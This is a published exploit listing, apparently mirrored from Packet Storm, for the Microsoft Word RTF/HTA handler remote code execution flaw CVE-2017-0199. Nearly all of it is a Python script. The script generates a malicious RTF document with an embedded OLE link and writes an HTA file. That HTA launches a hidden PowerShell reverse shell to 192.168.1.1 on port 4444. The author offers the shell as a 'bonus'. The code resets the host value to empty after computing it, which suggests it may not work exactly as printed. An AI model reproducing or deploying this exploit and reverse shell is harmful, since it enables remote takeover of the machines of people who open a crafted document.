Microsoft Word MTA Handler Remote Code Execution

Published: 27 Jun 2017 00:00:00. Reported by: Juan Sacco. Type: packetstorm. Source: packetstormsecurity.com. 359 views.

Microsoft Word MTA Handler Remote Code Execution (CVE-2017-0199), an RCE vulnerability. Failed exploit attempts could result in a denial-of-service condition.

`# Exploit Author: Juan Sacco at KPN Red Team  
# Developed using Exploit Pack - http://www.exploitpack.com  
# <[email protected]>  
#  
# Description: Microsoft Word (CVE-2017-0199) is prone to a RCE through  
# a HTA Handler  
# A remote code execution vulnerability exists in the way that  
# Microsoft Office and WordPad parse specially crafted files.  
# An attacker who successfully exploited this vulnerability could take  
# control of an affected system.  
#  
# Impact: An attacker could exploit this vulnerability to execute  
# arbitrary commands in the context of the application. Failed exploit  
# attempts could result in a denial-of-service condition.  
#  
# Vendor homepage: http://www.microsoft.com  
#  
# Credits: @ShadowBrokerss @EquationGroup @Petya @juansacco  
  
import binascii  
def chunk_str(str, chunk_size):  
    return [str[i:i+chunk_size] for i in range(0, len(str), chunk_size)]  
hta_host="" # 127.0.0.1  
for i in chunk_str(binascii.hexlify(b'http://127.0.0.1'),2):  
    hta_host+= str(i+"00")  
hta_host="" # 127.0.0.1  
hta_object = "01000002090000000100000000000000"  
hta_object += "0000000000000000a4000000e0c9ea79"  
hta_object += "f9bace118c8200aa004ba90b8c000000"  
hta_object += hta_host  
hta_object += "00000000795881f43b1d7f48af2c825d"  
hta_object += "c485276300000000a5ab0000ffffffff"  
hta_object += "0609020000000000c000000000000046"  
hta_object += "00000000ffffffff0000000000000000"  
hta_object += "906660a637b5d2010000000000000000"  
hta_object += "00000000000000000000000000000000"  
hta_object += "100203000d0000000000000000000000"  
hta_object += "0"*480  
rtf_template = "{\\rtf1\\adeflang1025\\ansi\\ansicpg1252\\uc1\\adeff31507\\deff0\\stshfdbch31505\\stshfloch31506\\stshfhich31506\\stshfbi31507\\deflang1033\\deflangfe2052\\themelang1033\\themelangfe2052\\themelangcs0\r\n{\\info\r\n{\\author Microsoft}\r\n{\\operator Microsoft}\r\n}\r\n{\\*\\xmlnstbl {\\xmlns1 http://schemas.microsoft.com/office/word/2003/wordml}}\r\n{\r\n{\\object\\objautlink\\objupdate\\rsltpict\\objw291\\objh230\\objscalex99\\objscaley101\r\n{\\*\\objclass Word.Document.8}\r\n{\\*\\objdata  
0105000002000000\r\n090000004f4c45324c696e6b000000000000000000000a0000\r\nd0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\nffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\nffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\nffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\nfffffffffffffffffdfffffffefffffffefffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\nffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\nffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\nffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\nffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff020000000003000000000000c000000000000046000000000000000000000000704d\r\n6ca637b5d20103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000200ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000\r\n000000000000000000000000f00000000000000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff0000000000000000000000000000000000000000000000000000\r\n0000000000000000000004000000060000000000000003004c0069006e006b0049006e0066006f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000014000200ffffffffffffffffffffffff000000000000000000000000000000000000000000000000\r\n00000000000000000000000005000000b700000000000000010000000200000003000000fefffffffeffffff0600000007000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\nffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\nffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\nffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\nffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\n"  
rtf_template += hta_object  
rtf_template += "0105000000000000}\r\n{\\result {\\rtlch\\fcs1 \\af31507 \\ltrch\\fcs0 \\insrsid1979324 }}}}\r\n{\\*\\datastore }\r\n}\r\n"  
print("[*] Microsoft Word RCE - HTA Handler by Juan Sacco")  
file_rtf = open("exploitpack.rtf","w")  
file_rtf.write(rtf_template)  
file_rtf.close()  
print("[*] RTF File created")  
print rtf_template  
# Extra bonus PS Reverse one-liner  
ps_reverse_shell = "$sm=(New-Object Net.Sockets.TCPClient(\"192.168.1.1\",4444)).GetStream();[byte[]]$bt=0..255|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}\r\n" # Reverse to 192.168.1.1 4444  
hta_template = "<script language=\"VBScript\">\r\nSet pwnShell = CreateObject(\"Wscript.Shell\") \r\nSet fsObject = CreateObject(\"Scripting.FileSystemObject\")\r\nIf fsObject.FileExists(pwnShell.ExpandEnvironmentStrings(\"%PSModulePath%\") + \"..\\powershell.exe\") Then\r\n pwnShell.Run \"powershell.exe -nop -w hidden -e "  
hta_template += ps_reverse_shell  
hta_template += "\",0\r\nEnd If\r\nwindow.close()\r\n</script>\r\n"  
file_hta = open("exploitpack.hta","w")  
file_hta.write(hta_template)  
file_hta.close()  
print("[*] HTA File created")  
print hta_template  
print("[*] Thanks NSA!")  
print("[*] Creditz: @EquationGroup @ShadowBrokers @juansacco")  
print("[*] KPN Red team: <[email protected]>")  
`

Published: 27 Jun 2017 00:00 (current). Vulners AI Score: 0.1 (low risk). EPSS: 0.99933. 359 views.